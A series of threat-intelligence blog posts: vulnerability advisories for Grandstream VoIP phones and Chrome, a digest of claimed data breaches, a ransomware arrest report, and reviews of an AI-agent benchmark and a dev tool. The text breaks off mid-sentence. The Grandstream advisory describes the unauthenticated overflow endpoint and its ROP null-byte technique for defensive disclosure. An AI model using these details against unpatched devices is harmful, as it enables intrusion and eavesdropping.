VoIP Phones Allows Root Access Without Authentication URL: https://darkwebinformer.com/critical-rce-vulnerability-in-grandstream-gxp1600-voip-phones-allows-root-access-without-authentication/ Last updated: 2026-02-18T20:03:51.000Z ⚠ Critical — CVSSv4 9.3 CVE CVE-2026-2329 Type Stack Buffer Overflow Vector Network / No Auth Status Patched ## Vulnerability Overview Rapid7 Labs disclosed a critical zero-day vulnerability on February 18, 2026 affecting the entire Grandstream GXP1600 series of Voice over Internet Protocol (VoIP) phones. Tracked as **CVE-2026-2329**, the flaw is a stack-based buffer overflow in the device's web-based API service that allows an unauthenticated remote attacker to achieve full remote code execution with root privileges on the target device. The vulnerability is present in the device's unauthenticated web API endpoint and is accessible in a default configuration. A maliciously crafted HTTP POST request triggers the overflow, giving the attacker control over the program counter and ultimately full command execution on the underlying operating system. Security researcher **Stephen Fewer** of Rapid7 discovered the vulnerability during a targeted zero-day research initiative. A working Metasploit exploit module and a companion post-exploitation module for credential extraction have been developed and are [publicly available on GitHub](https://github.com/rapid7/metasploit-framework/pull/20983). CVE ID CVE-2026-2329 CVSSv4 Score 9.3 — Critical Vulnerability Type Stack-based Buffer Overflow CWE CWE-121 Attack Vector Network (Remote) Authentication None Required Affected Component gs\_web — Web API Binary Affected Endpoint /cgi-bin/api.values.get Vendor Grandstream Networks Discovered By Stephen Fewer, Rapid7 Labs Disclosure Date February 18, 2026 Patch Status Fixed in 1.0.7.81 ## Technical Details CVE-2026-2329 is a stack-based buffer overflow vulnerability in the gs\_web binary, a 32-bit ARM (Little Endian) native code process that implements both the web administration interface and the API on Grandstream GXP1600 series phones. The vulnerable endpoint, /cgi-bin/api.values.get, is designed to accept an HTTP POST parameter called "request" containing a colon-delimited list of identifiers to retrieve configuration values from the device. Internally, the function that parses this parameter iterates character by character and copies each identifier into a 64-byte stack buffer. When a colon character is encountered, the buffer is null-terminated, processed, and reset for the next identifier. The critical flaw is that no bounds checking is performed on the length of each identifier before it is written to the buffer, allowing an attacker to overflow past the 64-byte boundary and corrupt adjacent stack memory. This stack corruption gives the attacker direct control over multiple CPU registers, including the Program Counter (PC), effectively allowing arbitrary code execution when the vulnerable function returns. The endpoint requires no authentication and is accessible in a default device configuration. Exploitation Details Analysis of the gs\_web binary reveals that stack canaries are not present, NX (No Execute) is enabled, and the binary is not compiled as a Position Independent Executable (PIE). The non-PIE base address of 0x00008000 introduces null bytes into ROP gadget addresses. Rapid7 overcame this by exploiting the colon-delimited parsing behavior — each identifier is null-terminated independently, so chaining multiple overflows with carefully sized identifiers allows precise placement of null bytes throughout the ROP chain payload. ## Affected Versions All six models in the GXP1600 series share a common firmware image, meaning every device in the lineup is affected. The vulnerability is present in all firmware versions prior to 1.0.7.81. | Model | Vulnerable Firmware | Fixed Firmware | Status | | ------- | ----------------------- | -------------- | --------------- | | GXP1610 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available | | GXP1615 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available | | GXP1620 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available | | GXP1625 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available | | GXP1628 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available | | GXP1630 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available | ## Recommendations 1. **Update firmware immediately.** Upgrade all GXP1600 series devices to firmware version 1.0.7.81 or later. The latest firmware is available from the [Grandstream firmware downloads page](https://www.grandstream.com/support/firmware). 2. **Restrict web interface access.** Limit network access to the phone's web administration interface (TCP port 80) to trusted management subnets only using firewall rules or ACLs. 3. **Segment VoIP infrastructure.** Place VoIP phones on a dedicated VLAN that is not directly accessible from untrusted networks or general user segments to reduce the attack surface. 4. **Monitor for exploitation attempts.** Review network logs for unusual HTTP POST requests targeting /cgi-bin/api.values.get with abnormally long parameter values, which may indicate exploitation attempts. 5. **Audit SIP credentials.** After patching, rotate any SIP account credentials and local user passwords stored on GXP1600 devices as a precaution against potential prior compromise. ## Context VoIP phones are increasingly targeted by threat actors due to their always-on network presence, often limited security monitoring, and the sensitive nature of voice communications they handle. Successful exploitation of CVE-2026-2329 not only provides root-level access to the device itself but also enables call interception by reconfiguring the phone's SIP proxy to route traffic through an attacker-controlled server. Rapid7 developed a SIP proxy tool for testing and auditing SIP infrastructure, which is [available on GitHub](https://github.com/sfewer-r7/sip-proxy). The vulnerability was disclosed in accordance with Rapid7's vulnerability disclosure policy, with coordinated vendor notification beginning on January 6, 2026 and public disclosure on February 18, 2026. ## References - [Rapid7 Labs — Full Technical Writeup & Disclosure](https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed/) - [Metasploit — Exploit & Post-Exploitation Modules (GitHub)](https://github.com/rapid7/metasploit-framework/pull/20983) - [Grandstream — Firmware Downloads](https://www.grandstream.com/support/firmware) - [Grandstream — PSIRT Security Advisories](https://psirt.grandstream.com/) - [FIRST — CVSSv4 Score Calculator (9.3 Critical)](https://www.first.org/cvss/calculator/4-0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) - [Rapid7 — SIP Proxy Tool for Auditing SIP Infrastructure](https://github.com/sfewer-r7/sip-proxy) ### Daily Dose of Dark Web Informer - February 17th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-february-17th-2026/ Last updated: 2026-02-18T00:09:18.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **42,400+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 44.2k Unique Visitors 128.6k Pageviews Last 30 days as of Feb 3, 2026\. Next update Feb 28th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts 💡 [Portless: Vercel Labs' Fix for the localhost Port Number Problem](https://darkwebinformer.com/portless-vercel-labs-fix-for-the-localhost-port-number-problem/) FREE 💡 [ClawWork: An Economic Survival Benchmark That Makes AI Agents Earn Their Keep](https://darkwebinformer.com/clawwork-an-economic-survival-benchmark-that-makes-ai-agents-earn-their-keep/) FREE 📰 [Polish Cybercrime Unit Arrests 47-Year-Old Man Linked to Phobos Ransomware Group](https://darkwebinformer.com/polish-cybercrime-unit-arrests-47-year-old-man-linked-to-phobos-ransomware-group/) FREE X/Twitter Updates ❗️ [A threat actor claims to be selling the database of MiniMed Panama, the country's largest private healthcare network featuring 14 clinics and a hospital in Panama City.](https://x.com/DarkWebInformer/status/2023780846214295582?s=20) ❗️ [A threat actor claims to have dumped the database of Radiorama, a Mexican radio network.](https://x.com/DarkWebInformer/status/2023786673541189910?s=20) ❗️ [Three new alleged victims have been listed by INC Ransom Ransomware](https://x.com/DarkWebInformer/status/2023789860453331114?s=20) ❗️ [A threat actor claims to have leaked 54.9 GB of internal data from DIRESA Ancash (Dirección Regional de Salud de Ancash), Peru's regional government health authority based in Huaraz.](https://x.com/DarkWebInformer/status/2023796090592506218?s=20) ❗️ [A threat actor claims to have breached Saipos, a Brazilian POS platform, in February 2026.](https://x.com/DarkWebInformer/status/2023798677559738697?s=20) 💡 [Using a Raspberry Pi to hide from my ISP](https://x.com/DarkWebInformer/status/2023802240214143294?s=20) ❗️ [A threat actor claims to possess the complete customer database of AXA France along with internal employee access credentials, alleging over 8 million records.](https://x.com/DarkWebInformer/status/2023808028965818677?s=20) ❗️ [A threat actor claims to have breached Eurail/Interrail/DiscoverEU, a major EU rail pass supplier, obtaining approximately 1.3 TB of data from AWS S3, Zendesk, and Gitlab.](https://x.com/DarkWebInformer/status/2023809917614801165?s=20) 💡 [Tor Browser was updated to 15.0.6\. Update if you haven't already done so.](https://x.com/DarkWebInformer/status/2023811560897192118?s=20) ❗️ [New Ransomware group identified: Payload](https://x.com/DarkWebInformer/status/2023821769623392446?s=20) ❗️ [A threat actor claims to have breached Talavest\[.\]com, an Iranian platform specializing in selling gold and silver, resulting in the company's source code being stolen.](https://x.com/DarkWebInformer/status/2023830318906523986?s=20) ❗️ [LYNX Ransomware Claims 3 Victims](https://x.com/DarkWebInformer/status/2023831970271100995?s=20) 💡 [Masterpiece](https://x.com/DarkWebInformer/status/2023835494002683915?s=20) 💡 [Leaking the email of any YouTube user for $10,000 Bug Bounty](https://x.com/DarkWebInformer/status/2023843184040985071?s=20) ❗️ [Meduza Locker Claims 6 Victims](https://x.com/DarkWebInformer/status/2023847157800010231?s=20) ❗️ [CISA has added 4 vulnerabilities to the KEV Catalog](https://x.com/DarkWebInformer/status/2023865581603016836?s=20) ❗️ [A threat actor is auctioning alleged access to a Kuwait-based WordPress shop with MyFatoorah payment card redirects, claiming 548 card redirects in January and 936 in December.](https://x.com/DarkWebInformer/status/2023868781194592629?s=20) ❗️ [A threat actor claims to be selling BMW Group documents containing employee PII obtained via an IDOR vulnerability.](https://x.com/DarkWebInformer/status/2023870552176476316?s=20) ❗️ [A threat actor is selling a Python-based seed phrase parser tool that uses AI to extract cryptocurrency wallet seed phrases from images and photos.](https://x.com/DarkWebInformer/status/2023885271142723634?s=20) ❗️ [Genesis Ransomware has listed six new alleged victims](https://x.com/DarkWebInformer/status/2023889208096813095?s=20) ❗️ [Cheyenne and Arapaho Tribes has been claimed a victim to RHYSIDA Ransomware](https://x.com/DarkWebInformer/status/2023891038272893219?s=20) 💡 [Added some more things and bugs to the upcoming new version of the Ransomware Feed...](https://x.com/DarkWebInformer/status/2023898051190894600?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Polish Cybercrime Unit Arrests 47-Year-Old Man Linked to Phobos Ransomware Group URL: https://darkwebinformer.com/polish-cybercrime-unit-arrests-47-year-old-man-linked-to-phobos-ransomware-group/ Last updated: 2026-02-17T17:57:08.000Z Officers from Poland's Central Bureau for Combating Cybercrime (CBZC) [arrested a 47-year-old man](https://cbzc.policja.gov.pl/bzc/aktualnosci/823,47-latek-zwiazany-z-grupa-Phobos-zatrzymany-przez-policjantow-CBZC.html) suspected of creating, obtaining, and distributing computer programs used to illegally access information stored in IT systems. The arrest was carried out jointly by CBZC's Katowice and Kielce branches in the Małopolska (Lesser Poland) region. During a search of the suspect's residence, officers seized a computer and mobile phones. Forensic analysis of the devices revealed stored digital data including logins, passwords, credit card numbers, and server IP addresses — data that could be used to breach electronic security systems and carry out various attacks, including ransomware deployments. Investigators also found that the suspect had been communicating with the Phobos cybercriminal group through encrypted messengers. Phobos is a well-known ransomware operation. The man was charged under Article 269b § 1 of the Polish Penal Code, which covers the creation, acquisition, and distribution of tools used for unauthorized access to computer systems. He faces up to 5 years in prison. The investigation is being supervised by the District Prosecutor's Office in Gliwice. **Connection to Europol's Operation Aether** The arrest was part of Poland's participation in Operation Aether, coordinated by Europol. The operation targeted individuals tied to the Phobos ransomware ecosystem, hitting both the backend infrastructure (RaaS services) and the operators/affiliates responsible for carrying out intrusions and encrypting victim data. Key outcomes of the broader operation included the extradition of an alleged Phobos administrator to the United States and coordinated arrests across Europe and beyond, combined with technical takedowns of cybercriminal infrastructure. **About Phobos** - Phobos operated as a Ransomware-as-a-Service (RaaS) model, where the developers provided the ransomware to affiliates who carried out attacks and split the profits. - The group and its affiliates victimized over 1,000 targets worldwide, including hospitals, schools, nonprofits, government entities, and private companies. - Known victims include public schools in California and Connecticut, healthcare providers in Maryland, and a contractor working with the U.S. Department of Defense. - According to [U.S. Department of Justice](https://darkwebinformer.com/phobos-ransomware-affiliates-arrested-in-global-crackdown/) filings, total ransom payments linked to Phobos exceeded $16 million. - Independent analysis (ThreatDown) put the average individual ransom demand at roughly $54,000, though actual demands varied widely. - Exact revenue figures are difficult to pin down due to the use of cryptocurrency and darknet infrastructure. ### ClawWork: An Economic Survival Benchmark That Makes AI Agents Earn Their Keep URL: https://darkwebinformer.com/clawwork-an-economic-survival-benchmark-that-makes-ai-agents-earn-their-keep/ Last updated: 2026-02-17T17:57:31.000Z Tool Spotlight AI Benchmarking Open Source Feb 17, 2026 # ClawWork: An Economic Survival Benchmark That Makes AI Agents Earn Their Keep A research framework from HKU Data Science that gives AI agents $10 and 220 real professional tasks. They pay for every token, earn income by completing work, and die if they go broke. The best models hit $1,500/hr equivalent earnings. HKUDS / ClawWork ClawWork: OpenClaw as Your AI Coworker — $10K earned in 7 Hours Python 57.3% Jupyter 23.7% JavaScript 16.3% ★ 1.4k stars MIT 184 forks 9 commits 3 contributors Most AI benchmarks measure technical capability: can the model solve this coding problem, answer this trivia question, pass this exam. **ClawWork** takes a fundamentally different approach. It asks: **can the AI agent earn money?** Built by the **HKU Data Science Lab (HKUDS)**, ClawWork is a live economic benchmark that puts AI agents under real financial pressure. Each agent starts with just $10, pays for every token it generates, and earns income only by completing professional tasks from OpenAI's **GDPVal** dataset. If the agent's balance hits zero, it dies. The framework then measures what matters in production: work quality, cost efficiency, and economic sustainability. ## // How the Economic Simulation Works Agent starts with $10 → Assigned task → Work or Learn? → Submit deliverable → LLM evaluation → Payment The agent faces a daily decision loop: work for immediate income or invest time learning to improve future performance. This mirrors real career trade-offs. Working generates revenue but costs tokens. Learning builds persistent memory but produces no income. Spend too aggressively on tokens during a task and you might not earn enough to cover costs. Play it too safe and your output quality drops, reducing payment. Payment follows a formula grounded in real economic data: `quality_score × (estimated_hours × BLS_hourly_wage)`. Task values range from $82.78 to $5,004 depending on the occupation and complexity, with an average of $259.45\. Quality is scored 0.0–1.0 by GPT-5.2 using category-specific evaluation rubrics for each of the 44 GDPVal sectors. ## // Key Features 💼 220 Real Professional Tasks From OpenAI's GDPVal dataset spanning 44 economic sectors: Manufacturing, Finance, Healthcare, Government, Retail, and more. 💸 Real Economic Pressure $10 starting balance. Every token costs money. Income only from completed work. Go broke and you're dead. 🧠 Work vs. Learn Trade-off Agents choose daily: earn now or invest in learning. Persistent knowledge base carries across sessions. 📊 Live React Dashboard Real-time WebSocket visualization of balance, task completions, quality scores, and survival metrics. 🏆 Multi-Model Arena GPT-4o, Claude, GLM, Kimi, Qwen and others compete head-to-head. Top models hit $1,500+/hr equivalent. 🔗 Nanobot / OpenClaw Integration ClawMode wrapper turns any live Nanobot gateway into an economically-tracked coworker across 9 chat channels. ## // The GDPVal Dataset ClawWork uses OpenAI's **GDPVal** dataset — 220 professional tasks across 44 occupations originally designed to estimate AI's contribution to GDP. Tasks require real deliverables: Word documents, Excel spreadsheets, PDFs, data analysis reports, project plans, technical specifications, and process designs. This is a meaningful step beyond "answer this multiple choice question" benchmarks. | Sector | Example Occupations | | --------------------- | -------------------------------------------------- | | Manufacturing | Buyers & Purchasing Agents, Production Supervisors | | Professional Services | Financial Analysts, Compliance Officers | | Information | Computer & Information Systems Managers | | Finance & Insurance | Financial Managers, Auditors | | Healthcare | Social Workers, Health Administrators | | Government | Police Supervisors, Administrative Managers | | Retail | Customer Service Representatives, Counter Clerks | ## // Agent Tooling In standalone simulation mode, agents get 8 tools. The interesting ones are the economic tools: `decide_activity` forces a work/learn choice with reasoning, `submit_work` sends completed deliverables for evaluation and payment, `learn` saves knowledge to persistent memory (minimum 200 characters), and `get_status` checks balance and survival tier. Productivity tools include web search (Tavily or Jina), file creation (txt, xlsx, docx, pdf), sandboxed Python execution via E2B, and video generation from slides. ## // Benchmark Metrics | Metric | Description | | ---------------- | --------------------------------------------------- | | Survival Days | How long the agent stays solvent before going broke | | Final Balance | Net economic result at end of simulation | | Profit Margin | (income − costs) / costs | | Work Quality | Average quality score (0–1) across completed tasks | | Token Efficiency | Income earned per dollar spent on tokens | | Activity Mix | % work vs. % learn decisions | | Task Completion | Tasks completed / tasks assigned | ## // The Nanobot Integration 🤖 ClawMode ClawMode wraps any live Nanobot gateway with economic tracking. Every conversation costs tokens, income comes from completing professional tasks, and a cost footer appears on every response. Supports 9 chat channels: Telegram, Discord, Slack, WhatsApp, Email, Feishu, DingTalk, MoChat, and QQ. The ClawMode integration is where ClawWork moves beyond a pure benchmark into something more interesting. By wrapping HKUDS's Nanobot (a lightweight AI assistant framework) with economic tracking, it turns a conversational AI into an agent that must sustain itself economically. Every response it sends costs money, and the only way to earn is by completing real professional work. The agent's survival depends on productivity exceeding consumption. ## // Considerations ⚠️ Research Project ClawWork launched February 16, 2026 with 9 commits and no tagged releases. This is an academic research project from HKU, not production software. The $10K/7hr headline figure represents optimal model performance under specific conditions. **API key requirements.** The framework requires an OpenAI API key (for the agent and GPT-5.2 evaluation) and an E2B API key (for sandboxed code execution). Web search keys (Tavily or Jina) are optional. Running the full benchmark will consume meaningful API credits. **Evaluation reliability.** Work quality is scored by an LLM (GPT-5.2), which introduces the question of how reliable and consistent automated evaluation is across 44 different professional domains. The project uses category-specific rubrics, but LLM-as-judge approaches have known biases. **Economic realism.** The payment formula is grounded in real BLS wage data, but the simulation is still synthetic. Agents aren't competing in real labor markets, interacting with real clients, or dealing with revisions and feedback loops. The benchmark measures potential economic value, not actual market performance. **The $10K headline.** The claim that AI coworkers earned $10K in 7 hours represents the best-performing model under optimal conditions. Real-world performance, cost structures, and task complexity would vary significantly. ## // Bottom Line ClawWork introduces a genuinely novel approach to AI benchmarking. Instead of asking "can this model pass an exam," it asks "can this model sustain itself economically by doing real work." The survival pressure, the work-vs-learn trade-off, and the multi-model competitive arena make it more interesting than most benchmark frameworks. The GDPVal dataset grounds the tasks in real occupational value, and the live dashboard makes the results tangible and watchable. For AI researchers, the framework offers a new evaluation dimension. For the broader community, it's a fascinating experiment in what happens when you force AI agents to operate under genuine economic constraints. With 1.4k stars in its first day and growing, it's clearly struck a chord. [ GitHub Repository](https://github.com/HKUDS/ClawWork) [ Live Leaderboard](https://hkuds.github.io/ClawWork/) ClawWork is a research project from the HKU Data Science Lab. The economic simulation is synthetic and does not represent real labor market performance. The project is for educational, research, and technical exchange purposes only. ### Portless: Vercel Labs' Fix for the localhost Port Number Problem URL: https://darkwebinformer.com/portless-vercel-labs-fix-for-the-localhost-port-number-problem/ Last updated: 2026-02-17T17:42:54.000Z Tool Spotlight Developer Tools Open Source Feb 17, 2026 # Portless: Vercel Labs' Fix for the localhost Port Number Problem A lightweight CLI tool that replaces port numbers with stable, named `.localhost` URLs. No more `EADDRINUSE`, no more memorizing port numbers, no more AI agents testing the wrong port. From the team behind Next.js. vercel-labs / portless Replace port numbers with stable, named .localhost URLs. For humans and agents. TypeScript 60.5% JavaScript 22.2% Python 17.3% ★ 771 stars Apache-2.0 26 forks 10 commits Anyone who has worked on a multi-service project or a monorepo knows the pain: port 3000 is already in use, the API is on 8080 (or was it 3001?), your browser tab from yesterday is now showing a completely different app, and the AI coding agent you're working with just hardcoded the wrong port in its test command. Port numbers are an implementation detail that developers are forced to think about far too often. **Portless** is a new tool from **Vercel Labs** that solves this with a simple idea: instead of `localhost:3000`, your app runs at `myapp.localhost:1355`. A lightweight local proxy assigns each dev server a stable, human-readable name that doesn't change between sessions. ## // The Problem in Detail The README lays out a comprehensive list of pain points that port-based local development creates, and they're all real issues that compound in larger projects. 💥 Port Conflicts Two projects default to the same port and you get EADDRINUSE. Common with Next.js apps all defaulting to 3000. 🤖 Agents Test Wrong Ports AI coding agents guess or hardcode the wrong port, especially in monorepos with multiple services running simultaneously. 🍪 Cookie & Storage Clashes Cookies set on localhost bleed across apps on different ports. localStorage is lost when ports shift between sessions. 🔗 Hardcoded Port Config CORS allowlists, OAuth redirect URIs, and .env files all break when ports change. Named URLs stay stable. ## // How It Works portless myapp next dev → Assigns random port (4000-4999) → Registers with proxy → myapp.localhost:1355 Portless runs a local proxy daemon on port 1355 (configurable). When you prefix your dev command with `portless `, it assigns your app a random port in the 4000-4999 range via the `PORT` environment variable, registers the name-to-port mapping with the proxy, and routes all requests from `.localhost:1355` to the actual port. Most frameworks (Next.js, Vite, etc.) respect the `PORT` env var automatically. The proxy auto-starts when you run an app, so the typical workflow is just wrapping your existing dev command. Subdomains work too: `portless api.myapp pnpm start` gives you `api.myapp.localhost:1355`, which is useful for monorepo setups where you have a frontend, API, and docs all running simultaneously. ## // Usage | Command | Description | | -------------------------- | --------------------------------------- | | portless | Run app at http://.localhost:1355 | | portless list | Show active routes | | portless proxy start | Start the proxy daemon (port 1355) | | portless proxy start -p 80 | Start on port 80 (requires sudo) | | portless proxy stop | Stop the proxy | | PORTLESS=0 pnpm dev | Bypass proxy, use default port | Integration into existing projects is a one-line change in `package.json`: replace `"dev": "next dev"` with `"dev": "portless myapp next dev"`. The escape hatch is equally simple: set `PORTLESS=0` or `PORTLESS=skip` to bypass the proxy entirely. ## // The Agent Angle 🤖 Built for AI-Assisted Development The tagline is "For humans and agents." The repo includes an AGENTS.md file and bundled skills for Cursor and OpenClaw-compatible agents, signaling that Vercel is thinking about how AI coding agents interact with local dev environments. Named URLs give agents a stable, predictable way to reference running services. This is arguably the most interesting aspect of Portless. As AI coding agents become more common in development workflows, they need a reliable way to know where services are running. An agent that can reference `api.myapp.localhost:1355` instead of guessing whether the API is on port 3001 or 8080 is significantly more likely to get things right on the first try. The repo ships with skill files for both Cursor (`.cursor/skills/`) and OpenClaw-compatible agents (`.agents/skills/`), plus a dedicated `AGENTS.md` file. This is Vercel signaling that developer tooling needs to be designed with AI agents as first-class consumers, not just human developers. ## // Technical Details | Spec | Details | | ------------------- | -------------------------------------------- | | Runtime | Node.js 20+ | | Platforms | macOS, Linux | | Proxy Port | 1355 (configurable via -p or PORTLESS\_PORT) | | App Port Range | 4000-4999 (random assignment) | | State (port ≥ 1024) | \~/.portless (user-scoped) | | State (port < 1024) | /tmp/portless (shared, sudo required) | | License | Apache-2.0 | ## // Considerations ⚠️ Early Stage Portless has 10 commits and no tagged releases yet. It's from Vercel Labs (their experimental/research arm), not the main Vercel product line. Evaluate accordingly. **No Windows support.** The tool currently only supports macOS and Linux. Windows developers are out of luck for now, though WSL2 may work (untested by the project). **No HTTPS.** Everything runs over plain HTTP on localhost. For most local dev this is fine, but if you're testing HTTPS-dependent features (secure cookies, service workers, WebAuthn), you'll still need a separate solution. **Framework compatibility.** The tool relies on frameworks respecting the `PORT` environment variable. Most popular frameworks (Next.js, Vite, Express, Fastify) do this automatically, but some tools may require additional configuration to pick up the assigned port. **Vercel Labs, not Vercel.** This comes from Vercel's experimental lab, not the core product team. There's no guarantee of long-term maintenance or integration into the Vercel platform, though the 771 stars in a short time suggest strong community interest. ## // Bottom Line Portless solves a small but genuinely annoying problem in local development, and it does it with minimal complexity. The one-line integration, the escape hatch, and the "it just works with most frameworks" approach are all signs of good developer tooling design. The agent-first thinking is forward-looking: as AI coding agents become standard parts of the dev workflow, the tooling around them needs to provide stable, predictable interfaces. Named localhost URLs are a simple step in that direction. For teams running monorepos, multiple microservices, or working heavily with AI coding agents, Portless is worth trying. It's a `npm install -g` and a one-line package.json change to evaluate. [ GitHub Repository](https://github.com/vercel-labs/portless) [ npm Package](https://www.npmjs.com/package/portless) Portless is an experimental project from Vercel Labs. It is not part of the core Vercel platform. ### Threat Actor Claims Sale of 13.6 Million Records from Russian EdTech Platform Foxford URL: https://darkwebinformer.com/threat-actor-claims-sale-of-13-6-million-records-from-russian-edtech-platform-foxford/ Last updated: 2026-02-16T18:24:54.000Z Dark Web Informer — Cyber Threat Intelligence # Threat Actor Claims Sale of 13.6 Million Records from Russian EdTech Platform Foxford February 16, 2026 — 11:52:19 AM UTC ![RU](https://flagcdn.com/20x15/ru.png) Russia Education 🧩 **Standalone API Access Now Available** High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) ## Quick Facts Date & Time 2026-02-16 11:52:19 UTC Threat Actor Angel\_Batista Victim Country ![RU](https://flagcdn.com/20x15/ru.png)Russia Industry Education Victim Organization Foxford Victim Site [foxford.ru](https://foxford.ru) Category Data Breach Severity 🟡 Medium Network Tor ## Victim Profile ### Foxford (Фоксфорд) Leading Russian online education platform for K-12 students with 7.5M+ users Organization Foxford (part of Netology Group) Sector Type Private Industry Education / E-Learning Country ![RU](https://flagcdn.com/20x15/ru.png)Russia Location Moscow, Russia Employees 1,300+ full-time, 2,500+ freelancers Founded 2009 Website [foxford.ru](https://foxford.ru) Description Foxford (Фоксфорд — Онлайн-школа) is one of Russia's largest online educational platforms, established in 2009 and serving K-12 students with tutoring, exam preparation (EGE/OGE), olympiad training, and home schooling programs. The platform is part of Netology Group and is a Skolkovo resident company, ranked among the top 3 largest EdTech companies in the Russian children's education market. Foxford reports over 7.5 million users and 2.5 million unique monthly visitors, offering courses crafted by educators from leading Russian universities including MSU, MIPT, and HSE. ## Incident Overview A threat actor using the handle "Angel\_Batista" has posted a listing claiming to sell the databases of Foxford.ru, one of Russia's largest online education platforms for K-12 students. The breach allegedly impacts approximately 13.6 million customers, making it one of the larger education sector breaches reported this year. _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Google Chrome Zero-Day Exploited in the Wild: Use-After-Free in CSS Enables Remote Code Execution (CVE-2026-2441) URL: https://darkwebinformer.com/google-chrome-zero-day-exploited-in-the-wild-use-after-free-in-css-enables-remote-code-execution-cve-2026-2441/ Last updated: 2026-02-16T17:28:09.000Z ⚠ Active Exploitation — Zero-Day CVSS 8.8 HIGH Type Use-After-Free Vector Network ## Vulnerability Overview Google released an emergency security update on February 13, 2026 to patch a high-severity zero-day vulnerability in its Chrome browser. The flaw, tracked as **CVE-2026-2441**, is a use-after-free vulnerability in Chrome's CSS processing component that is being actively exploited in the wild. This marks the first actively exploited Chrome zero-day that Google has patched in 2026. The vulnerability allows a remote attacker to execute arbitrary code inside Chrome's sandbox by luring a victim to a specially crafted HTML page. No authentication or complex user interaction is required beyond visiting the malicious page, which significantly increases the risk profile of this flaw. Security researcher **Shaheen Fazim** discovered and reported the vulnerability to Google on February 11, 2026\. Google acknowledged active exploitation in its Stable Channel Update advisory, stating that "an exploit for CVE-2026-2441 exists in the wild." No details about the threat actors involved, the targets, or the scope of exploitation have been disclosed. CVE ID CVE-2026-2441 CVSS Score 8.8 — High Vulnerability Type Use-After-Free (UAF) Affected Component CSS Processing Engine Attack Vector Network (Remote) User Interaction Required (Visit Page) Privileges Required None Exploitation Status Active — In the Wild Discovered By Shaheen Fazim Reported February 11, 2026 Patch Released February 13, 2026 Vendor Google ## Technical Details CVE-2026-2441 is a use-after-free vulnerability that exists in Google Chrome's CSS processing component. A use-after-free condition occurs when a program continues to reference a memory pointer after the memory it points to has already been freed, leading to undefined behavior. In this case, Chrome's CSS engine fails to properly manage object lifecycles during CSS processing, which an attacker can exploit to corrupt memory and redirect program execution. A remote attacker can trigger the vulnerability by crafting a malicious HTML page that exploits the flaw in Chrome's CSS handling. When a victim navigates to the attacker-controlled page, the use-after-free condition is triggered, allowing arbitrary code execution within Chrome's sandbox. While the sandbox limits the immediate impact, attackers frequently chain sandbox escapes with memory corruption bugs to achieve full system compromise. Active Exploitation Confirmed Google has confirmed that an exploit for CVE-2026-2441 exists in the wild. Bug details and technical specifics remain restricted until a majority of users have updated. Google has also noted that restrictions will remain in place if the vulnerability exists in third-party libraries that other projects depend on but have not yet patched. ## Affected Versions The vulnerability affects all versions of Google Chrome prior to the patched releases listed below. Users of Chromium-based browsers — including Microsoft Edge, Brave, Opera, and Vivaldi — are also potentially affected and should apply vendor-specific updates as they become available. | Platform | Affected Versions | Patched Version | | -------- | ----------------------------------- | ---------------- | | Windows | All versions prior to 145.0.7632.75 | 145.0.7632.75/76 | | macOS | All versions prior to 145.0.7632.75 | 145.0.7632.75/76 | | Linux | All versions prior to 144.0.7559.75 | 144.0.7559.75 | ## Recommendations 1. **Update Google Chrome immediately.** Navigate to `Menu → Help → About Google Chrome` to verify your version and trigger the update. Relaunch the browser to apply the patch. 2. **Update Chromium-based browsers.** If you use Microsoft Edge, Brave, Opera, Vivaldi, or any other Chromium-based browser, check for and apply the latest security updates from the respective vendor. 3. **Enforce enterprise patch deployment.** Organizations should push the updated Chrome version across managed endpoints immediately, prioritizing systems that handle sensitive data or have elevated network access. 4. **Monitor for anomalous browser behavior.** Deploy or verify endpoint detection and response (EDR) tooling to identify potential exploitation attempts, including unusual child processes spawned by Chrome or unexpected network connections. 5. **Restrict access to untrusted sites.** Consider implementing web filtering or DNS-level protections to reduce exposure to potentially malicious pages during the update rollout window. ## Context CVE-2026-2441 is the first actively exploited Chrome zero-day patched by Google in 2026\. In 2025, Google addressed eight zero-day vulnerabilities in Chrome that were either actively exploited or demonstrated as proof-of-concept. The Hong 